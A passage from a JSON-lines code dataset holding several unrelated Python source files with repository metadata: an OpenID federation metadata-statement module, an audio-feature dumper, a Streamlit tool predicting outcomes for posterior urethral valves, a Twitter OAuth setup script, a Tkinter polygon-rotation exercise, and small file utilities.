VerificationError\nfrom cryptojwt.key_jar import KeyJar\nfrom oidcmsg.message import OPTIONAL_LIST_OF_STRINGS\nfrom oidcmsg.message import SINGLE_OPTIONAL_STRING\nfrom oidcmsg.message import SINGLE_OPTIONAL_JSON\nfrom oidcmsg.oidc import JsonWebToken\nfrom oidcmsg.oidc import OPTIONAL_MESSAGE\nfrom oidcmsg.oidc import RegistrationRequest\n\nlogger = logging.getLogger(__name__)\n\n__author__ = 'roland'\n__version__ = '0.7.6'\n\n#: Contexts in which metadata statements can be used\nCONTEXTS = ['registration', 'discovery', 'response']\n\nMIN_SET = dict([(k, {}) for k in CONTEXTS])\n\n\nclass MetadataStatementError(Exception):\n pass\n\n\nclass NoSuitableFederation(MetadataStatementError):\n pass\n\n\nclass NoTrustedClaims(MetadataStatementError):\n pass\n\n\nclass NoSigningKeys(Exception):\n pass\n\n\nclass MetadataStatement(JsonWebToken):\n \"\"\"\n A base class for metadata statements based on JSON web token\n \"\"\"\n c_param = JsonWebToken.c_param.copy()\n c_param.update({\n \"signing_keys\": SINGLE_OPTIONAL_JSON,\n 'signing_keys_uri': SINGLE_OPTIONAL_STRING,\n 'metadata_statements': OPTIONAL_MESSAGE,\n 'metadata_statement_uris': OPTIONAL_MESSAGE,\n 'signed_jwks_uri': SINGLE_OPTIONAL_STRING,\n 'federation_usage': SINGLE_OPTIONAL_STRING\n })\n\n def verify(self, **kwargs):\n \"\"\"\n Verifies that an instance of this class adheres to the given\n restrictions.\n\n :param kwargs: A set of keyword arguments\n :return: True if it verifies OK otherwise False.\n \"\"\"\n super(MetadataStatement, self).verify(**kwargs)\n if \"signing_keys\" in self:\n if 'signing_keys_uri' in self:\n raise VerificationError(\n 'You can only have one of \"signing_keys\" and '\n '\"signing_keys_uri\" in a metadata statement')\n else:\n # signing_keys MUST be a JWKS\n kj = KeyJar()\n try:\n kj.import_jwks(self['signing_keys'], '')\n except Exception:\n raise VerificationError('\"signing_keys\" not a proper JWKS')\n\n if \"metadata_statements\" in self and \"metadata_statement_uris\" in self:\n s = set(self['metadata_statements'].keys())\n t = set(self['metadata_statement_uris'].keys())\n if s.intersection(t):\n raise VerificationError(\n 'You should not have the same key in \"metadata_statements\" '\n 'and in \"metadata_statement_uris\"')\n\n return True\n\n\nclass ClientMetadataStatement(MetadataStatement):\n \"\"\"\n A Client registration Metadata statement.\n \"\"\"\n c_param = MetadataStatement.c_param.copy()\n c_param.update(RegistrationRequest.c_param.copy())\n c_param.update({\n \"scope\": OPTIONAL_LIST_OF_STRINGS,\n 'claims': OPTIONAL_LIST_OF_STRINGS,\n })\n\n\nclass ProviderConfigurationResponse(oidc.ProviderConfigurationResponse,\n MetadataStatement):\n \"\"\"\n A Provider info metadata statement\n \"\"\"\n c_param = MetadataStatement.c_param.copy()\n c_param.update(oidc.ProviderConfigurationResponse.c_param.copy())\n\n def verify(self, **kwargs):\n oidc.ProviderConfigurationResponse.verify(self, **kwargs)\n return MetadataStatement.verify(self, **kwargs)\n\n\ndef unfurl(jwt):\n \"\"\"\n Return the body of a signed JWT, without verifying the signature.\n \n :param jwt: A signed JWT \n :return: The body of the JWT as a 'UTF-8' string\n \"\"\"\n\n _rp_jwt = factory(jwt)\n return json.loads(_rp_jwt.jwt.part[1].decode('utf8'))\n\n\ndef keyjar_from_metadata_statements(iss, msl):\n \"\"\"\n Builds a keyJar instance based on the information in the 'signing_keys'\n claims in a list of metadata statements.\n \n :param iss: Owner of the signing keys \n :param msl: List of :py:class:`MetadataStatement` instances.\n :return: A :py:class:`oidcmsg.key_jar.KeyJar` instance\n \"\"\"\n keyjar = KeyJar()\n for ms in msl:\n keyjar.import_jwks(ms['signing_keys'], iss)\n return keyjar\n\n\ndef read_jwks_file(jwks_file):\n \"\"\"\n Reads a file containing a JWKS and populates a\n :py:class:`oidcmsg.key_jar.KeyJar` from it.\n\n :param jwks_file: file name of the JWKS file \n :return: A :py:class:`oidcmsg.key_jar.KeyJar` instance\n \"\"\"\n _jwks = open(jwks_file, 'r').read()\n _kj = KeyJar()\n _kj.import_jwks(json.loads(_jwks), '')\n return _kj\n\n\ndef is_lesser(a, b):\n \"\"\"\n Verify that an item *a* is <= then an item *b*\n \n :param a: An item\n :param b: Another item\n :return: True or False\n \"\"\"\n\n if type(a) != type(b):\n return False\n\n if isinstance(a, str) and isinstance(b, str):\n return a == b\n elif isinstance(a, bool) and isinstance(b, bool):\n return a == b\n elif isinstance(a, list) and isinstance(b, list):\n for element in a:\n flag = 0\n for e in b:\n if is_lesser(element, e):\n flag = 1\n break\n if not flag:\n return False\n return True\n elif isinstance(a, dict) and isinstance(b, dict):\n if is_lesser(list(a.keys()), list(b.keys())):\n for key, val in a.items():\n if not is_lesser(val, b[key]):\n return False\n return True\n return False\n elif isinstance(a, int) and isinstance(b, int):\n return a <= b\n elif isinstance(a, float) and isinstance(b, float):\n return a <= b\n\n return False\n\n\n#: When flattening a grounded metadata statement these claims should be ignored.\nIgnoreKeys = list(JsonWebToken.c_param.keys())\n\n#: When comparing metadata statement these claims should be ignored.\nDoNotCompare = list(\n set(MetadataStatement.c_param.keys()).difference(IgnoreKeys))\nDoNotCompare.append('kid')\n\n# These 2 should definitely not be modified\nDoNotCompare.remove('signed_jwks_uri')\nDoNotCompare.remove('federation_usage')\n\n\nclass KeyBundle(key_bundle.KeyBundle):\n \"\"\"\n Extended :py:class:`oidcmsg.key_bundle.KeyBundle` class that supports\n signed JWKS uris.\n \"\"\"\n def __init__(self, keys=None, source=\"\", cache_time=300, verify_ssl=True,\n file_format=\"jwk\", keytype=\"RSA\", keyusage=None,\n verify_keys=None):\n super(KeyBundle, self).__init__(keys=keys, source=source,\n cache_time=cache_time,\n verify_ssl=verify_ssl,\n fileformat=file_format,\n keytype=keytype, keyusage=keyusage)\n if verify_keys is not None:\n if isinstance(verify_keys, KeyJar):\n self.verify_keys = verify_keys\n else:\n self.verify_keys = KeyJar()\n self.verify_keys.import_jwks(verify_keys, '')\n\n def _parse_remote_response(self, response):\n \"\"\"\n Parse simple JWKS or signed JWKS from the HTTP response.\n\n :param response: HTTP response from the 'jwks_uri' or 'signed_jwks_uri'\n endpoint\n :return: response parsed as JSON or None\n \"\"\"\n # Check if the content type is the right one.\n try:\n if response.headers[\"Content-Type\"] == 'application/json':\n logger.debug(\n \"Loaded JWKS: %s from %s\" % (response.text, self.source))\n try:\n return json.loads(response.text)\n except ValueError:\n return None\n elif response.headers[\"Content-Type\"] == 'application/jwt':\n logger.debug(\n \"Signed JWKS: %s from %s\" % (response.text, self.source))\n _jws = factory(response.text)\n _resp = _jws.verify_compact(\n response.text, keys=self.verify_keys.get_signing_key())\n return _resp\n else:\n logger.error('Wrong content type: {}'.format(\n response.headers['Content-Type']))\n raise ValueError('Content-type mismatch')\n except KeyError:\n pass\n","repo_name":"IdentityPython/fedoidcmsg","sub_path":"src/fedoidcmsg/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"71198106651","text":"import math\nimport os\nfrom io import open\nimport json\nimport librosa\nimport struct\nimport numpy\nimport glob\nimport array\n\n\ndef get_data_dir():\n return os.path.dirname(os.path.abspath(__file__))\n\n\ndef get_songs_dir():\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bsaber/')\n\n\ndef get_data_file(num):\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data_' + str(num) + '.dat')\n\n\ndef get_data_files():\n return glob.glob(os.path.join(get_data_dir() + \"*.dat\"))\n\n\ndef load_info(dir):\n with open(dir + '/info.dat', 'r') as f:\n return json.load(f)\n\n\ndef extract_features(file, bands=128):\n sound_clip, s = librosa.load(file)\n\n melspec = librosa.feature.melspectrogram(sound_clip, n_mels=bands)\n\n return librosa.amplitude_to_db(melspec)\n\n\ndef dump_data(batches, bands=128):\n songs = [f.path for f in os.scandir(get_songs_dir()) if f.is_dir()]\n dataset_length = math.floor(len(songs) / batches)\n\n for i in range(batches):\n with open(get_data_file(i), 'wb') as dataFile:\n dataFile.write(struct.pack('i', bands))\n\n for j in range(dataset_length):\n song = songs[i * dataset_length + j]\n info = load_info(song)\n x = extract_features(song + '/' + info['_songFilename'], bands)\n y = info['_beatsPerMinute']\n\n dataFile.write(struct.pack('f', y))\n dataFile.write(struct.pack('i', x.shape[1]))\n\n for k in range(bands):\n dataFile.write(struct.pack('f'*x.shape[1], *x[k].tolist()))\n\n\ndef load_data(file):\n with open(file, 'rb') as dataFile:\n bands = struct.unpack('i', dataFile.read(struct.calcsize('i')))[0]\n\n while True:\n read = dataFile.read(struct.calcsize('f'))\n\n if not read:\n break\n\n y = struct.unpack('f', read)[0]\n length = struct.unpack('i', dataFile.read(struct.calcsize('i')))[0]\n spec = []\n\n for i in range(bands):\n line = array.array('f')\n line.fromstring(dataFile.read(struct.calcsize('f'*length)))\n\n spec.append(line)\n\n x = numpy.array(spec)\n\n yield [x, y]\n\n\nif __name__ == '__main__':\n dump_data(5)\n\n for data in load_data('./data_1.dat'):\n continue\n\n print('done')\n","repo_name":"gmanen/saberify","sub_path":"data/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74449343452","text":"\"\"\"\r\nTitle: Posterior Urethral Valves Outcomes Prediction (PUVOP): a machine learning tool to predict clinically relevant\r\noutcomes in boys with posterior urethral valves\r\n\r\nAuthors: Jethro CC. Kwong, Adree Khondker, Jin Kyu Kim, Michael Chua, Daniel T. Keefe, Joana Dos Santos, Marta Skreta,\r\nLauren Erdman, John Weaver, Gregory Tasian, Chia Wei Teoh, Mandy Rickard, Armando J. Lorenzo\r\n\r\nPUVOP was developed to predict three specific outcomes:\r\n1. Any decline in renal function, based on CKD stage progression\r\n2. Need for renal replacement therapy (dialysis or transplant)\r\n3. Need for clean intermittent catheterization\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nimport matplotlib.pyplot as plt\r\nfrom pathlib import Path\r\nfrom google_drive_downloader import GoogleDriveDownloader as gdd\r\nimport SessionState\r\nfrom pysurvival.utils import load_model\r\n\r\ndef main():\r\n st.title(\"Posterior Urethral Valves Outcomes Prediction (PUVOP)\")\r\n st.sidebar.image(\"SickKids logo.png\", use_column_width=True)\r\n st.sidebar.subheader(\"Navigation\")\r\n session_state = SessionState.get(button_id=\"\", color_to_label={})\r\n PAGES = {\r\n \"PUVOP Tool\": full_app,\r\n \"About\": about\r\n }\r\n page = st.sidebar.selectbox(\"Select Page\", options=list(PAGES.keys()))\r\n PAGES[page](session_state)\r\n\r\n\r\ndef full_app(session_state):\r\n st.sidebar.header(\"Enter patient values\")\r\n st.subheader(\"Instructions\")\r\n st.markdown(\r\n \"\"\"\r\n 1. Enter patient values on the left\r\n 1. **High-Grade VUR on initial VCUG**: presence of Grade IV or V vesicoureteral reflux (VUR) on initial \r\n voiding cystourethrogram (VCUG)\r\n 2. **Serum nadir creatinine at first year of presentation**: for patients with neonatal diagnosis of PUV, this \r\n would refer to serum nadir creatinine within the first year of life. Please ensure creatinine is inputted in \r\n the correct units\r\n 3. **Renal dysplasia at presentation**: this includes increased echogenicity, cortical cysts, or reduced \r\n corticomedullary differentiation on renal ultrasound\r\n 4. **Baseline eGFR at one year, or at time of presentation** \r\n 1. Press submit button\r\n 1. The models will generate predictions\r\n \"\"\"\r\n )\r\n\r\n col1, col2, col3 = st.columns([1, 1, 1])\r\n col1.header(\"CKD progression-free survival\")\r\n col1.write(\"This will predict the probability of your kidney function worsening, based on progression \"\r\n \"in stage of chronic kidney disease (CKD).\")\r\n col1.write(\"\"\"\"\"\")\r\n col2.header(\"RRT-free survival\")\r\n col2.write(\"This will predict the probability of avoiding the need to start renal replacement therapy (RRT), \"\r\n \"such as dialysis or transplant.\")\r\n col2.write(\"\"\"\"\"\")\r\n col3.header(\"CIC-free survival\")\r\n col3.write(\"This will predict the probability of avoiding the need to start clean intermittent catheterization (CIC).\")\r\n col3.write(\"\"\"\"\"\")\r\n\r\n # Load saved items from Google Drive\r\n CKD_location = st.secrets['CKD']\r\n RRT_location = st.secrets['RRT']\r\n CIC_location = st.secrets['CIC']\r\n\r\n @st.cache(allow_output_mutation=True)\r\n def load_items():\r\n save_dest = Path('model')\r\n save_dest.mkdir(exist_ok=True)\r\n CKD_checkpoint = Path('model/CKD.zip')\r\n RRT_checkpoint = Path('model/RRT.zip')\r\n CIC_checkpoint = Path('model/CIC.zip')\r\n\r\n # download from Google Drive if model or features are not present\r\n if not CKD_checkpoint.exists():\r\n with st.spinner(\"Downloading model... this may take awhile! \\n Don't stop it!\"):\r\n gdd.download_file_from_google_drive(CKD_location, CKD_checkpoint)\r\n if not RRT_checkpoint.exists():\r\n with st.spinner(\"Downloading model... this may take awhile! \\n Don't stop it!\"):\r\n gdd.download_file_from_google_drive(RRT_location, RRT_checkpoint)\r\n if not CIC_checkpoint.exists():\r\n with st.spinner(\"Downloading model... this may take awhile! \\n Don't stop it!\"):\r\n gdd.download_file_from_google_drive(CIC_location, CIC_checkpoint)\r\n\r\n CKD_model = load_model(CKD_checkpoint)\r\n RRT_model = load_model(RRT_checkpoint)\r\n CIC_model = load_model(CIC_checkpoint)\r\n\r\n return CKD_model, RRT_model, CIC_model\r\n\r\n CKD_model, RRT_model, CIC_model = load_items()\r\n\r\n # Define choices and labels for feature inputs\r\n CHOICES = {0: 'No', 1: 'Yes'}\r\n\r\n def format_func_yn(option):\r\n return CHOICES[option]\r\n\r\n with st.sidebar:\r\n with st.form(key='my_form'):\r\n vur = st.selectbox('High Grade VUR on initial VCUG', options=list(CHOICES.keys()),\r\n format_func=format_func_yn, index=1)\r\n units = st.radio('Units of measurement for creatinine',('mg/dL', 'umol/L'), index=0)\r\n snc = st.number_input('Serum nadir creatinine at first year of presentation', 0.00, 1000.00, value=0.50)\r\n renal_dysplasia = st.selectbox('Renal dysplasia at presentation', options=list(CHOICES.keys()),\r\n format_func=format_func_yn, index=1)\r\n egfr = st.number_input('Baseline eGFR at one year, or at time of presentation', 0.00, 1000.00, value=58.00)\r\n\r\n submitted = st.form_submit_button(label='Submit')\r\n\r\n if submitted:\r\n if units == 'mg/dL':\r\n snc=snc\r\n else:\r\n snc=snc/88.42\r\n data = {'Max VUR grade': vur,\r\n 'SNC1 (mg/dL)': snc,\r\n 'Antenatal/Postnatal renal dysplasia': renal_dysplasia,\r\n 'Baseline eGFR': egfr\r\n }\r\n\r\n data_features = pd.DataFrame(data, index=[0])\r\n\r\n if submitted:\r\n st.write(\"\"\"\"\"\")\r\n\r\n # CKD progression-free survival\r\n CKD_survival = CKD_model.predict_survival(data_features).flatten()\r\n CKD_survival_1yr = CKD_model.predict_survival(data_features, t=365)\r\n CKD_survival_3yr = CKD_model.predict_survival(data_features, t=1095)\r\n\r\n # Displaying the functions\r\n fig, ax = plt.subplots()\r\n plt.plot(CKD_model.times, CKD_survival, color='blue', lw=2, ls='-')\r\n\r\n # Axis labels\r\n plt.xlabel('Time from baseline assessment (years)')\r\n plt.ylabel('CKD progression-free survival (%)')\r\n\r\n # Tick labels\r\n plt.ylim(0, 1.05)\r\n y_positions = (0, 0.2, 0.4, 0.6, 0.8, 1)\r\n y_labels = ('0', '20', '40', '60', '80', '100')\r\n plt.yticks(y_positions, y_labels, rotation=0)\r\n plt.xlim(0, 4000)\r\n x_positions = (0, 365, 1095, 1825, 3650)\r\n x_labels = ('0', '1', '3', '5', '10')\r\n plt.xticks(x_positions, x_labels, rotation=0)\r\n\r\n # Tick vertical lines\r\n plt.axvline(x=365, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1095, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1825, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=3650, color='black', ls='--', alpha=0.2)\r\n\r\n CKDprob_1yr = str(np.round(CKD_survival_1yr*100, 1))[1:-1]\r\n CKDprob_3yr = str(np.round(CKD_survival_3yr*100, 1))[1:-1]\r\n\r\n col1.write(f\"**Probability of avoiding CKD progression at 1 year:** {CKDprob_1yr}\")\r\n col1.write(f\"**Probability of avoiding CKD progression at 3 years:** {CKDprob_3yr}\")\r\n if egfr < 15:\r\n col1.write(\"\"\"\"\"\")\r\n col1.write(\"The patient has already progressed to end-stage renal disease based on the information \"\r\n \"provided\")\r\n else:\r\n col1.pyplot(fig)\r\n\r\n # RRT progression-free survival\r\n RRT_survival = RRT_model.predict_survival(data_features).flatten()\r\n RRT_survival_1yr = RRT_model.predict_survival(data_features, t=365)\r\n RRT_survival_3yr = RRT_model.predict_survival(data_features, t=1095)\r\n\r\n # Displaying the functions\r\n fig2, ax2 = plt.subplots()\r\n plt.plot(RRT_model.times, RRT_survival, color='red', lw=2, ls='-')\r\n\r\n # Axis labels\r\n plt.xlabel('Time from baseline assessment (years)')\r\n plt.ylabel('RRT-free survival (%)')\r\n\r\n # Tick labels\r\n plt.ylim(0, 1.05)\r\n y_positions = (0, 0.2, 0.4, 0.6, 0.8, 1)\r\n y_labels = ('0', '20', '40', '60', '80', '100')\r\n plt.yticks(y_positions, y_labels, rotation=0)\r\n plt.xlim(0, 4000)\r\n x_positions = (0, 365, 1095, 1825, 3650)\r\n x_labels = ('0', '1', '3', '5', '10')\r\n plt.xticks(x_positions, x_labels, rotation=0)\r\n\r\n # Tick vertical lines\r\n plt.axvline(x=365, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1095, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1825, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=3650, color='black', ls='--', alpha=0.2)\r\n\r\n RRTprob_1yr = str(np.round(RRT_survival_1yr * 100, 1))[1:-1]\r\n RRTprob_3yr = str(np.round(RRT_survival_3yr * 100, 1))[1:-1]\r\n\r\n col2.write(f\"**Probability of avoiding RRT at 1 year:** {RRTprob_1yr}\")\r\n col2.write(f\"**Probability of avoiding RRT at 3 years:** {RRTprob_3yr}\")\r\n col2.pyplot(fig2)\r\n\r\n # CIC progression-free survival\r\n CIC_survival = CIC_model.predict_survival(data_features).flatten()\r\n CIC_survival_1yr = CIC_model.predict_survival(data_features, t=365)\r\n CIC_survival_3yr = CIC_model.predict_survival(data_features, t=1095)\r\n\r\n # Displaying the functions\r\n fig3, ax3 = plt.subplots()\r\n plt.plot(CIC_model.times, CIC_survival, color='green', lw=2, ls='-')\r\n\r\n # Axis labels\r\n plt.xlabel('Time from baseline assessment (years)')\r\n plt.ylabel('CIC-free survival (%)')\r\n\r\n # Tick labels\r\n plt.ylim(0, 1.05)\r\n y_positions = (0, 0.2, 0.4, 0.6, 0.8, 1)\r\n y_labels = ('0', '20', '40', '60', '80', '100')\r\n plt.yticks(y_positions, y_labels, rotation=0)\r\n plt.xlim(0, 4000)\r\n x_positions = (0, 365, 1095, 1825, 3650)\r\n x_labels = ('0', '1', '3', '5', '10')\r\n plt.xticks(x_positions, x_labels, rotation=0)\r\n\r\n # Tick vertical lines\r\n plt.axvline(x=365, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1095, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=1825, color='black', ls='--', alpha=0.2)\r\n plt.axvline(x=3650, color='black', ls='--', alpha=0.2)\r\n\r\n CICprob_1yr = str(np.round(CIC_survival_1yr * 100, 1))[1:-1]\r\n CICprob_3yr = str(np.round(CIC_survival_3yr * 100, 1))[1:-1]\r\n\r\n col3.write(f\"**Probability of avoiding CIC at 1 year:** {CICprob_1yr}\")\r\n col3.write(f\"**Probability of avoiding CIC at 3 years:** {CICprob_3yr}\")\r\n col3.pyplot(fig3)\r\n\r\n\r\ndef about(session_state):\r\n st.markdown(\r\n \"\"\"\r\n Welcome to Posterior Urethral Valves Outcomes Prediction (PUVOP) tool. PUVOP was developed to predict three specific\r\n outcomes:\r\n * Any decline in renal function, based on CKD stage progression\r\n * Need for renal replacement therapy (dialysis or transplant)\r\n * Need for clean intermittent catheterization\r\n \r\n The CKD-progression, renal replacement therapy, and clean intermittent catheterization-free surivival models \r\n achieved a c-index of 0.765, 0.952, and 0.700, respectively, and outperformed Cox proportional hazards regression. \r\n Additional information can be found in the reference below or by contacting the authors.\r\n \r\n \"\"\"\r\n )\r\n st.subheader(\"Reference\")\r\n st.markdown(\r\n \"\"\"\r\n **Posterior Urethral Valves Outcomes Prediction (PUVOP): a machine learning tool to predict clinically relevant \r\n outcomes in boys with posterior urethral valves**\\n\r\n *Jethro CC. Kwong, Adree Khondker, Jin Kyu Kim, Michael Chua, Daniel T. Keefe, Joana Dos Santos, Marta Skreta, \r\n Lauren Erdman, John Weaver, Gregory Tasian, Chia Wei Teoh, Mandy Rickard, Armando J. Lorenzo*\r\n \r\n \"\"\"\r\n )\r\n\r\nif __name__ == \"__main__\":\r\n st.set_page_config(page_title=\"PUVOP - Posterior Urethral Valves Outcome Prediction\",\r\n page_icon=\":toilet:\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\"\r\n )\r\n main()\r\n","repo_name":"JCCKwong/PUVOP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17117608562","text":"import sys\nimport cgi\nimport configparser\nimport requests_oauthlib\n\ncfg = configparser.ConfigParser()\ncfg.read('planet.ini')\n\nif not cfg.has_option('twitter', 'consumer') or not cfg.has_option('twitter', 'consumersecret'):\n print(\"Before you can run this, you need to register an application at\")\n print(\"developer.twitter.com and put the consumer and consumersecret values\")\n print(\"in the [twitter] section of planet.ini.\")\n sys.exit(1)\n\noauth = requests_oauthlib.OAuth1Session(cfg.get('twitter', 'consumer'), cfg.get('twitter', 'consumersecret'), callback_uri='oob')\nfetch_response = oauth.fetch_request_token('https://api.twitter.com/oauth/request_token')\nauth_url = oauth.authorization_url('https://api.twitter.com/oauth/authorize')\n\nprint(\"Please go to {0} and log in\".format(auth_url))\npin = input('Enter the PIN received here:')\n\noauth2 = requests_oauthlib.OAuth1Session(cfg.get('twitter', 'consumer'),\n cfg.get('twitter', 'consumersecret'),\n fetch_response.get('oauth_token'),\n fetch_response.get('oauth_token_secret'),\n verifier=pin)\ntokens = oauth2.fetch_access_token('https://api.twitter.com/oauth/access_token')\n\n\nprint(\"Access token received.\")\nprint(\"Register the following two valuesi n planet.ini under [twitter]:\")\nprint(\"token={0}\".format(tokens.get('oauth_token')))\nprint(\"secret={0}\".format(tokens.get('oauth_token_secret')))\n","repo_name":"mhagander/hamn","sub_path":"setuptwitter.py","file_name":"setuptwitter.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"73700761371","text":"from tkinter import *\nimport math as m\n\nwindow = Tk()\nwindow.title(\"грустная лаба номер один\")\nwindow.geometry('1000x600')\ncoord_system = Canvas(window, width=2000, height=1200, bg=\"#FFFFFF\")\n\n\ndef rotate():\n # point_list.pop(-1)\n print(point_list)\n deg=float(ent_deg.get())\n radian=deg/180*3.14\n # i=0\n # point_list[i][0]=rotate_center[0]+ (point_list[i][0]-rotate_center[0])*m.cos(radian) - (point_list[i][1]-rotate_center[1])*m.sin(radian)\n # point_list[i][1]=rotate_center[1]+ (point_list[i][0]-rotate_center[0])*m.sin(radian) + (point_list[i][1]-rotate_center[1])*m.cos(radian)\n for i in range(0, len(point_list)):\n point_list[i]=[\\\n rotate_center[0]+ (point_list[i][0]-rotate_center[0])*m.cos(radian) - (point_list[i][1]-rotate_center[1])*m.sin(radian),\\\n rotate_center[1]+ (point_list[i][0]-rotate_center[0])*m.sin(radian) + (point_list[i][1]-rotate_center[1])*m.cos(radian)\\\n ]\n # point_list[i][1]=rotate_center[1]+ (point_list[i][0]-rotate_center[0])*m.sin(radian) + (point_list[i][1]-rotate_center[1])*m.cos(radian)\n coord_system.create_oval(point_list[i][0],\n point_list[i][1],\n point_list[i][0],\n point_list[i][1],\n fill=\"red\",\n width=8,\n outline=\"red\")\n for i in range(0, len(point_list)):\n coord_system.create_line(point_list[i-1][0],\n point_list[i-1][1],\n point_list[i][0],\n point_list[i][1],\n fill=\"#000000\",\n width=2)\n # print(point_list)\n\nglobal first_point\nglobal prev_point\n# global firtst_point_element\n# firtst_point_element=None\nfirst_point = [None, None]\nprev_point = [None, None]\nrotate_center = [None, None]\npoint_list = []\n\n\ndef finish_construct(event):\n coord_system.create_line(prev_point[0],\n prev_point[1],\n first_point[0],\n first_point[1],\n fill=\"#000000\",\n width=2)\n print(\"ayaya\")\n coord_system.unbind(\"<Button-1>\")\n\n\ndef set_point(event):\n if first_point[0] == None:\n first_point[0] = event.x\n first_point[1] = event.y\n firtst_point_element = coord_system.create_oval(event.x,\n event.y,\n event.x,\n event.y,\n fill=\"red\",\n width=12,\n outline=\"red\")\n coord_system.tag_bind(firtst_point_element, '<Button-1>',\n finish_construct)\n # prev_point[0] = event.x\n # prev_point[1] = event.y\n else:\n coord_system.create_oval(event.x,\n event.y,\n event.x,\n event.y,\n fill=\"red\",\n width=8,\n outline=\"red\")\n coord_system.create_line(prev_point[0],\n prev_point[1],\n event.x,\n event.y,\n fill=\"#000000\",\n width=2)\n prev_point[0] = event.x\n prev_point[1] = event.y\n point_list.append([event.x, event.y])\n print(point_list)\n\n\ndef set_rotate_scenter(event):\n print(\"set_rotate_scenter at {0} {1}\".format(event.x, event.y))\n rotate_center[0] = event.x\n rotate_center[1] = event.y\n coord_system.create_oval(event.x,\n event.y,\n event.x,\n event.y,\n fill=\"blue\",\n width=10,\n outline=\"blue\")\n coord_system.unbind(\"<Button-3>\")\n\n\ndef create_gui():\n lbl_main = Label(window, text=\"постройте замкнутый многоугольник \")\n lbl_main.pack(side=TOP)\n global ent_deg\n frm_deg = Frame(window)\n ent_deg = Entry(frm_deg, width=30)\n lbl_deg = Label(frm_deg, text=\"введите угол\\n поворота(deg)\")\n global btn_deg\n btn_deg = Button(frm_deg, text=\"повернуть\", command=rotate)\n lbl_deg.pack(side='left')\n ent_deg.pack(side='left')\n btn_deg.pack(side='left')\n frm_deg.pack(anchor=\"nw\")\n\n\ncreate_gui()\ncoord_system = Canvas(window, width=2000, height=900, bg=\"#FFFFFF\")\ncoord_system.pack()\ncoord_system.bind(\"<Button-1>\", set_point)\ncoord_system.bind(\"<Button-3>\", set_rotate_scenter)\nwindow.mainloop()","repo_name":"alexpskovalex/iIKG","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6437439693","text":"import os\nfrom shutil import copy2, copyfile, copytree\n\ndir_path = '/media/silence/DataT/dataset_collect2/hongjunminghui'\n# minghuihongjun_dataset_path = '/media/silence/DataT/dataset_collect2/hongjunminghui'\ndest_path = '/media/silence/DataT/dataset_collect2/newfiles'\nsubdir_name = os.listdir(dir_path)\nsubdir_colorpath = []\ndestdir_colorpath = []\n\n\nfor dirname in subdir_name:\n subdir_path = os.path.join(dir_path, dirname)\n subdir_colorpath.append(os.path.join(subdir_path, 'color'))\n\nfor color in subdir_colorpath:\n\n destdir_colorpath = os.path.join(dest_path, os.path.split(os.path.split(color)[0])[1])\n dest = os.path.join(destdir_colorpath, 'color')\n try:\n copytree(color,dest)\n print(\"%s is copied success\" % dest)\n except:\n print(\"%s is already existed\" % dest)\n continue\n","repo_name":"memoryunreal/trackit3dtool","sub_path":"realsense_py/kinect/test/move_color2selet.py","file_name":"move_color2selet.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33396479897","text":"import json\n\ndef writeToJsonFile(path,filename,data):\n\tfilePathNameWExt = './' + path + '/' + filename\n\twith open(filePathNameWExt, 'w') as fp:\n\t\tjson.dump(data,fp)\n\n\n#data = json.load(open('2017122521_nba-okc_BOX.json'))\n \n\n#writeToJsonFile('./','dummy.json',data)\n","repo_name":"stibbs1998/basketball_analytics2018","sub_path":"json_related/json_writer.py","file_name":"json_writer.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17754667722","text":"from test import affine_detect\nfrom find_obj import init_feature, filter_matches, explore_match\nfrom multiprocessing.pool import ThreadPool\nimport cv2 as cv\nimport sys, getopt\nfrom matplotlib import pyplot as plt\nimport time\nimport numpy as np\nfrom matplotlib import gridspec\n#opts, args = getopt.getopt('orb', '', ['feature='])\n#opts = dict(opts)\n'''\n--feature: sift/surf/orb/akaze \n'''\n#feature_name = opts.get('--feature', 'orb-flann')\nimg1 = cv.imread('1403636579813555456.png', 0)\nimg1 = cv.resize(img1,(256,256))\ndetector, matcher = init_feature('sift-flann')\npool = ThreadPool(processes=cv.getNumberOfCPUs())\nkp1, desc1 = affine_detect(detector, img1, pool=pool)\n\nnewk_list = []\nnewd_list = []\npts = cv.KeyPoint_convert(kp1)\nptsx = pts[:,0]\nptsy = pts[:,1]\n\nco = cv.KeyPoint_convert(newk_list)\n\nimport numpy as np\nimport math\n\nclass Anagrams:\n def __init__(self, x):\n self.list1=[]\n self.qtree=x\n def get_point(self,tree):\n self.list1=self.list1+tree.points2\n if 'nw' in tree.__dict__:\n self.list1=self.list1+tree.nw.points2\n if 'ne' in tree.__dict__:\n self.list1=self.list1+tree.ne.points2\n if 'se' in tree.__dict__:\n self.list1=self.list1+tree.se.points2\n if 'sw' in tree.__dict__:\n self.list1=self.list1+tree.sw.points2\n if 'nw' 